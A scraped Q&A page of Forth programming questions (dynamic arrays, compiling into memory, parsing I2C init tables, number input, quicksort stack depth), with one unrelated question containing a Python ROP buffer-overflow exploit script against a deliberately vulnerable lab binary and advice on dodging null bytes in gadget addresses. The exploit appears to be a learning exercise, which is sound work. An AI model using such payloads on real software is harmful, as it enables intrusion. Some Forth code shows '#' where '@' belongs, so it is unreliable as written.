How would one go about implementing a vector or dynamic array in forth? - forth

I need to a dynamic array in forth, but I don't have any idea of how I could implement it. I searched online, and couldn't find any results either. I'm very new to forth, and just starting to learn it. I think I could just use a variable to store the length, and allocate more as I go, but I don't know if this even works since I am also able to write outside of the allocated space of the array.

It depends on what you really need. Below is code to create dynamic arrays of cells. Quickly tested in VFX Forth and GForth. There's probably neater and better optimised versions around.
0 [IF]
dynamic array is an address stored in the dictionary pointing to
a structure stored in allocated memory
0 CELL \ data size in bytes n CELLS
1 CELL \ start of data
...
n CELL \ End of data
[THEN]
\ Take dictionary address and return addresses of the array
: array-size \ a -- n ;
# # ;
: array-data \ a -- a' ;
# CELL + ;
\ **********************************************************
\ **********************************************************
\ Expand the data structure and copy the 'old' data into it.
\ This either expands the data to size or to twice the
\ original size whichever is larger.
\ ALLOCATE THROW and FREE THROW catch & report any memory
\ errors.
\ **********************************************************
: dyn-expand \ size a-dict -- ;
DUP >R
array-size 2* MAX \ new-size = largest of the ix offset
\ or 2 * current size.
DUP CELL + ALLOCATE THROW ( new-size new-addr )
2DUP CELL + SWAP ERASE \ zero the newly allocated memory
R# array-data OVER CELL + R# array-size
( size new-addr old-data-a new-data-a old-size )
MOVE \ Shift existing data to the new addr. ( size new-addr )
R# # FREE THROW \ Free the old data's memory
TUCK ! \ Store the new size
R> ! ; \ Store the new address in the dictionary
: dynamic-array \ CREATE: count -- ; DOES> ix -- a
\ Creates a dynamic array of count cells in ALLOCATED memory.
CREATE \ count -- ;
CELLS DUP CELL + ALLOCATE THROW ( count addr )
DUP , \ Store the data address in the dictionary
2DUP ! \ Store the data size in the allocated memory
CELL + SWAP ERASE \ Zero the new data region.
DOES> \ ix -- addr-of-ix-cell ;
\ Returns the address of the ix th cell. Expanding the array if required.
( ix a )
SWAP CELLS SWAP 2DUP array-size >= IF \ ix not in allocated range
2DUP dyn-expand
THEN
( ix-cells a ) array-data + ;
: dyn-stats. \ a -- ; Prints base address and array size
." Base data address: " DUP .
." Data size in bytes: " CELL - # . ;
Quick tests and use:
16 dynamic-array ]test ok
456 0 ]test ! 4560 10 ]test ! ok
CR 0 ]test dyn-stats. ." 0th and 10th Data: " 0 ]test # . 10 ]test # . CR
Base data address: 9459864 Data size in bytes: 128 0th and 10th Data: 456 4560
******* ***
ok
1600 16 ]test ! \ This extends the array. ok
CR 0 ]test dyn-stats. ." 0th and 10th Data: " 0 ]test # . 10 ]test # . CR
Base data address: 10502952 Data size in bytes: 256 0th and 10th Data: 456 4560
ok ******** Address Changed *** & size changed unchanged!!
." 16th data: " 16 ]test # . 16th data: 1600 ok

Related

ROP Exploit: Address contains null byte

I'm currently trying to adapt this example of a simple ROP attack to x64.
When compiling the program accordingly:
gcc -O0 -g -static -fno-stack-protector -no-pie -o simple_rop64 ./simple_rop.c
And trying to adjust the used addresses of the functions (using gdb) I have the following problem. The x64 address of, e.g., the lazy() function is at 0x401b9d, which is only three bytes. Thus, struct.pack will add a null-byte.
The python interpreter will therefore throw an error when executing with this error message:
python rop_exploit.py
[...]
os.system("./simple_rop64 \"%s\"" % payload)
TypeError: system() argument 1 must be string without null bytes, not str
Is it even possible to use this function address (which is always three bytes only) for this vulnerable program? Or do I have to adjust it otherwise?
Thanks for any help.
Here the python script I adjusted
#Find gadgets
#objdump -d simple_rop64 | grep --color -E -A2 "pop +%rbp"
#47c54a: 5d pop %rbp
#47c54b: c3 retq
pop_ret = 0x47c54a # start address of a pop,ret sequence
#objdump -d simple_rop32 | grep --color -A2 8049ca4
#8049ca4: 5f pop %edi
#8049ca5: 5d pop %ebp
#8049ca6: c3 ret
pop_pop_ret = 0x8049ca4 # start address of a pop,pop,ret sequence
lazy = 0x401b9d # objdump -d | grep lazy
food = 0x401bb0 # objdump -d | grep food
feeling_sick = 0x401c0c # objdump -d | grep feeling_sick
#Buffer Overflow
#0x0000000000401d0d <+45>: lea -0x70(%rbp),%rax
payload = "A"*0x70
# Saved RBP register
payload += "BBBBBBBB"
#food(0xdeadbeef) gadget
payload += struct.pack("I", food)
payload += struct.pack("I", pop_ret)
payload += struct.pack("I", 0xdeadbeef)
#feeling_sick(0xd15ea5e, 0x0badf00d) gadget
payload += struct.pack("I", feeling_sick)
payload += struct.pack("I", pop_pop_ret)
payload += struct.pack("I", 0xd15ea5e)
payload += struct.pack("I", 0x0badf00d)
payload += struct.pack("I", lazy)
os.system("./simple_rop64 \"%s\"" % payload)
You can't. What you could do instead is find a gadget that does a certain operation and do the opposite in your exploit.
For example if you find a gadget that does xor eax, 0xFFFFFFFF then you could just xor your address with it (0x401b9d ^ 0xFFFFFFFF = 0xFFBFE462) so that it fits 4 bytes. pop this intermediate value into eax and call your gadget so that your intermediate value becomes the address you want. Then you jump to it.

How do I compile to arbitrary memory and execute it in Forth?

I'm interesting in testing some of the limits of Gforth and would like to have it execute arbitrary code that I "hand compile" into allocated memory. Here is my attempt.
100 cells allocate throw constant &mem
\ store at &mem: docol: . EXIT
docol: &mem !
comp' . &mem 1 cells + ! drop \ drop "execution token"
comp' EXIT &mem 2 cells + ! drop
42 \ something to print
&mem execute
Unfortunately this fails with:
in file included from *OS command line*:-1
notes/execute.fs:8: Invalid memory address
&mem >>>execute<<<
Backtrace:
$7EFC61175B28 execute
I have to use comp' instead of ', because it doesn't work for getting the xt of EXIT.
I would have thought this should work, unless Gforth doesn't operate in any way like JonesForth did where docol: starts executing the xt's next to it.
Is this possible in either Gforth or ANS forth in general?
You can execute an arbitrary list of xt, but you have to use your own word to execute this list, by applying execute to each xt from the list.
By the current standard, a standard program cannot compile arbitrary code into allocated memory. The program may only compile into the code space of the dictionary, and in the frame of the current definition (i.e., that is not yet completed). Compilation can be performed via compile, ( xt -- ) or postpone ( i*x "name" -- j*x ) words. Also the words literal, 2literal, sliteral, fliteral (or their counterparts lit,, 2lit,, slit,, flit,) can be used to compile literals.
In Gforth you can also compile into another dictionary ("section"), that can be allocated using word extra-section ( size "name" -- ).
10000 extra-section execute-in-my-section
\ execute-in-my-section ( i*x xt -- j*x )
unused cr . \ free space in the default dictionary
[:
unused cr . \ free space in the current section
:noname
postpone .
postpone ;
( xt-new )
unused cr . \ free space after compile the new definition
;] execute-in-my-section ( xt-new )
\ test
123 swap execute
See also section.fs source, and Sections paper by Anton Ertl, 2016.

Forth: How to create a word that compiles other words until certain delimiter is found?

I use Forth (namely Swapforth) to configure certain hardware via I2C. I have a word:
i2c1-send ( reg-address byte -- )
that writes a byte to the specific internal register of a certain chip.
The initialization sequence is quite long, and therefore implementing it as below is not vialable due to memory consumption.
: i2c1-init
$1201 $10 i2c1-send
$2130 $43 i2c1-send
[...]
$0231 $43 i2c1-send
;
I have created an implementation that creates a structure holding the length of the sequence in the first cell and triple bytes in the next cells. (Please note that i2c1-send is just a placeholder allowing you to test it without my hardware).
: i2c1-send ( reg_addr byte -- )
\ It is just a placeholder to show what will be written in HW
swap
." addr=" hex . ." val=" . decimal CR
;
: i2c1: ( "<spaces>name" -- )
create here $326e9 0 ,
does> dup cell+ swap
# 0 do
dup c# >r 1+
dup c# 8 lshift swap 1+
dup c# rot or r> i2c1-send
1+
loop
drop
;
: i2c1-def ( addr val -- )
c, ( adr )
dup 8 rshift c,
255 and c,
;
: i2c1; ( -- )
\ Make sure that i2c1: was used before
$326e9 <> abort" i2c1; without i2c1:"
dup cell+ here swap - ( first_cell length )
\ Verify that the length is a multiple of 3
3 /mod swap 0<> abort" illegal length - not a multiple of 3"
swap !
;
With the above code you define the initialization list similarly:
i2c1: set1
$1234 $11 i2c1-def
$1521 $18 i2c1-def
[...]
$2313 $10 i2c1-def
i2c1;
But the memory consumption is significantly reduced (by factor of 2 in case of J1B Forth CPU).
However I dislike the syntax. I'd prefere to have something that would allow to define the initialization list just by numbers, until certain delimiter is found, like below:
i2c1-x: i2c1-init
$1234 $11
$1521 $18
[...]
$2313 $10
i2c1-x;
I have created the word shown below:
: i2c-delim s" i2c1-x;" ;
: i2c1-x: create here 0 ,
begin
parse-name
2dup i2c-delim compare 0<> while
evaluate \ We store the address later
parse-name
evaluate
c,
\ Now store the address
dup 8 rshift c,
255 and c,
repeat
2drop
dup cell+ here swap - ( first_cell length )
\ Verify that the length is a multiple of 3
3 /mod swap 0<> abort" length not a multiple of 3"
swap !
does> dup cell+ swap
# 0 do
dup c# >r 1+
dup c# 8 lshift swap 1+
dup c# rot or r> i2c1-send
1+
loop
drop
;
It works perfectly for short definitions:
i2c1-x: set2 $1234 $ac $6543 $78 $9871 $01 $3440 $02 i2c1-x;
But fails for longer ones that use multiple lines:
i2c1-x: set2
$1234 $ac
$6543 $78
$9871 $01
$3440 $02
i2c1-x;
Is it possible to define i2c1-x so that it handles multiple lines, or do I have to use solution based on separate i2c1:, i2c1-def and i2c1;?
There is REFILL word to parse multiple lines.
\ Get the next name (lexeme) possibly from the next lines
\ NB: Use the result of parse-name-sure immediate
\ since it may be garbled after the next refill
\ (the buffer may be be overwritten by the next line).
: parse-name-sure ( -- c-addr u|0 )
begin parse-name dup 0= while refill 0= if exit then 2drop repeat
;
\ Check if the first string equals to the second
: equals ( c-addr2 u2 c-addr1 u1 -- flag )
dup 3 pick <> if 2drop 2drop false exit then
compare 0=
;
It is a common approach to translate the input until some delimiter. A general function to perform this approach:
\ Translate the input till a delimiter
\ using xt as translator for a lexeme
2variable _delimiter
: translate-input-till-with ( i*x c-addr u xt -- j*x )
>r _delimiter 2!
begin parse-name-sure dup while
2dup _delimiter 2# equals 0= while
r# execute
repeat then 2drop rdrop
;
There is a sense to also factor out the manipulation of 16-bits units into a library:
[undefined] w# [if]
\ NB: little-endian endianness variant
: w! ( x addr -- ) dup 1+ >r >r dup 8 rshift r> c! r> c! ;
: w# ( addr -- x ) dup c# 8 lshift swap 1+ c# or ;
: w, ( x -- ) here 2 allot w! ;
[then]
Also, a function to converting text into number should be in a library. Using evaluate for that is not hygienic. See example of StoN definition in "How to enter numbers in Forth" question. A helper to convert the "$"-prefixed numbers may be found in your Forth-system.
\ dummy definitions for test only
: s-to-n ( addr u -- x ) evaluate ;
: send-i2c1 ( addr x -- ) ." send: " . . CR ;
The application code:
\ Translate the input numbers till the delimiter into the special format
\ (the code could be simplified using the quotations)
: i2c-delim s" i2c1-x;" ;
: translate-i2c-pair ( c-addr u -- )
s-to-n
parse-name-sure
2dup i2c-delim equals abort" translate-i2c: unexpected delimiter"
s-to-n c, w,
;
: translate-i2c-input ( -- )
i2c-delim ['] translate-i2c-pair translate-input-till-with
;
\ Send data from the special format
: send-i2c1-bulk ( addr u -- )
3 / 0 ?do
dup c# swap 1+
dup w# swap 2+ >r send-i2c1 r>
loop drop
;
\ The defining word
: i2c1-x:
create here >r 0 , here >r translate-i2c-input here r> - r> !
does> dup cell+ swap # send-i2c1-bulk
;
A testcase
i2c1-x: test
1 2
3 4
5
6
i2c1-x;
test

How to enter numbers in Forth

Is there something like input in Basic or scanf("%d") in C in Forth?
Probably it will be something like this:
200 buffer: buf
: input ( -- n ) buf 200 accept
some-magic-filter
buf swap evaluate ;
The problem in the above code, is how to define a filter that will pass only numbers, but not any words, definitions, etc?
The standard specifies only a low level >NUMBER word to interpret integer numbers.
OTOH using EVALUATE to convert strings into numbers is a quick and dirty way. Either use it without checks (in the case of trusted input) or do not use it at all. Trying to filter the string before EVALUATE is a bad idea: it has cost of >NUMBER word itself and low reusing factor.
NB: neither >NUMBER nor EVALUATE detects numeric overflow.
In any case, your word to input a single-cell integer can be defined something like:
: accept-number ( -- n )
PAD DUP 80 ACCEPT ( addr u ) StoN ( n )
;
In the case of trusted input you can define StoN like
: StoN ( addr u -- x )
STATE # ABORT" This naive StoN should not be used in compilation state"
DEPTH 2- >R
EVALUATE
DEPTH 1- R> <> IF -24 THROW THEN
\ check depth to accept the single-cell numbers only
;
Otherwise (in the case of untrusted input) you have two choices: to rely on the specific words of a particular Forth system or to use some (perhaps your own) library.
I use the following lexicon to define StoN:
\ ---
\ The words from Substring Matching library
\ (where length is counted in address units)
: MATCH-HEAD ( a u a-key u-key -- a-right u-right true | a u false )
2 PICK OVER U< IF 2DROP FALSE EXIT THEN
DUP >R
3 PICK R# COMPARE IF RDROP FALSE EXIT THEN
SWAP R# + SWAP R> - TRUE
;
\ ---
\ The words from Literals interpreting library
\ (where prefix 'I-' is shortcut for Interpret)
: I-DLIT ( a u -- x x true | a u false )
2DUP S" -" MATCH-HEAD >R
DUP 0= IF NIP RDROP EXIT THEN
0 0 2SWAP >NUMBER NIP IF RDROP 2DROP FALSE EXIT THEN
R> IF DNEGATE THEN 2SWAP 2DROP TRUE
;
: I-LIT ( a u -- x true | a u false )
I-DLIT IF D>S TRUE EXIT THEN FALSE
;
After that StoN can be defined as:
: StoN ( a u -- x ) I-LIT IF EXIT THEN -24 THROW ;
The mentioned libraries can be found at GitHub:
Substring matching functions library
Resolvers example (for various lexemes)
Rosetta Code suggests this code snippet, working with GForth 0.6.2, to determine if an input string is numeric:
: is-numeric ( addr len -- )
2dup snumber? ?dup if
0< if
-rot type ." as integer = " .
else
2swap type ." as double = " <# #s #> type
then
else 2dup >float if
type ." as float = " f.
else
type ." isn't numeric in base " base # dec.
then then ;
I built a BASIC like #INPUT word for Camel Forth to give BASIC users something more familiar. It takes more than one might think. It starts with $ACCEPT which can be used to like input with a string variable or memory block.
The definition of NUMBER? here is for single ints only but it compiles on GForth. It outputs true if conversion is bad; the reverse of SNUMBER?
DECIMAL
: NUMBER? ( addr len -- n ?) \ ?=0 is good conversion
( -- addr len) \ bad conversion
OVER C# [CHAR] - = DUP >R \ save flag for later
IF 1 /STRING THEN \ remove minus sign
0 0 2SWAP >NUMBER NIP NIP \ convert the number
R> IF SWAP NEGATE SWAP THEN \ negate if needed
;
: $ACCEPT ( $addr -- ) CR ." ? " DUP 1+ 80 ACCEPT SWAP C! ;
: #INPUT ( variable -- ) \ made to look/work like TI-BASIC
BEGIN
PAD $ACCEPT \ $ACCEPT text into temp buffer PAD
PAD COUNT NUMBER? \ convert the number in PAD
WHILE \ while the conversion is bad do this
CR ." Input error "
CR DROP
REPEAT
SWAP ! ; \ store the number in the variable
\ USAGE: VARIABLE X
\ X #INPUT

Problems with quicksort in Forth for big sorted arrays

I use Quicksort to sort integers being elements in sets represented by entries on a stack. It works okay except when it has to sort larger (about 10,000 elements) sets which happens to be sorted already.
: adswap \ ad1 ad2 --
over # over # swap rot ! swap ! ;
: singlepart \ ad1 ad2 -- ad
tuck 2dup # locals| p ad | swap \ ad2 ad2 ad1
do i # p < \ ad2 flag
if ad i adswap ad cell + to ad then cell \ ad2 cell
+loop ad adswap ad ; \ ad
: qsort \ ad1 ad2 -- pointing on first and last cell in array
2dup <
if 2dup singlepart >r
swap r# cell - recurse
r> cell + swap recurse
else 2drop
then ;
Could it be overflow in the return stack? It's virtually impossible for the program to keep in track when the array is sorted or not, so how to solve the problem?
Yes, Quicksort is known to be a subject of the return stack overflow in the edge cases in naive implementation. The solution is also known: use smaller part for recursion and another part for tail call. Oh, this recipe is already described in Wikipedia too:
To make sure at most O(log n) space is used, recurse first into the
smaller side of the partition, then use a tail call to recurse into
the other.
Tail call optimization transforms a call into jump, so it does not use the return stack.
Updated qsort definition:
: qsort \ ad1 ad2 -- pointing on first and last cell in array
begin
2dup < 0= if 2drop exit then
2dup - negate 1 rshift >r \ keep radius (half of the distance)
2dup singlepart 2dup - >r >r \ ( R: radius distance2 ad )
r# cell - swap r> cell+ swap \ ( d-subarray1 d-subarray2 )
2r> u< if 2swap then recurse \ take smallest subarray first
again \ tail call optimization by hand
;

Resources